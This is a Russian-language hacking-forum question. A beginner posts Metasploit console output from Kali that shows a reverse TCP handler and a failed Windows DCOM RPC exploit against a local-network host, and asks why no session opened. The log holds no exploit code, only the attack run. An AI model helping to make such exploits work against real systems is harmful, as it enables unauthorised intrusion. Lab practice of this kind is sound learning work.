• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

На кали пытаюсь запустить эксплойт, вроде как все норм настроил (запускаю через Кали) По итогу ничего не работает. Начинающий в этом деле, помогите пж

  • Автор темы Автор темы MegDog
  • Дата начала Дата начала

MegDog

New member
18.12.2022
1
0
Started reverse TCP handler on 192.168.0.101:4444
[*] 192.168.0.103:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.103:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.103[135] ...
[*] 192.168.0.103:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Exploit completed, but no session was created.
===
Если нужны скрины вы попросите я вам скину
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab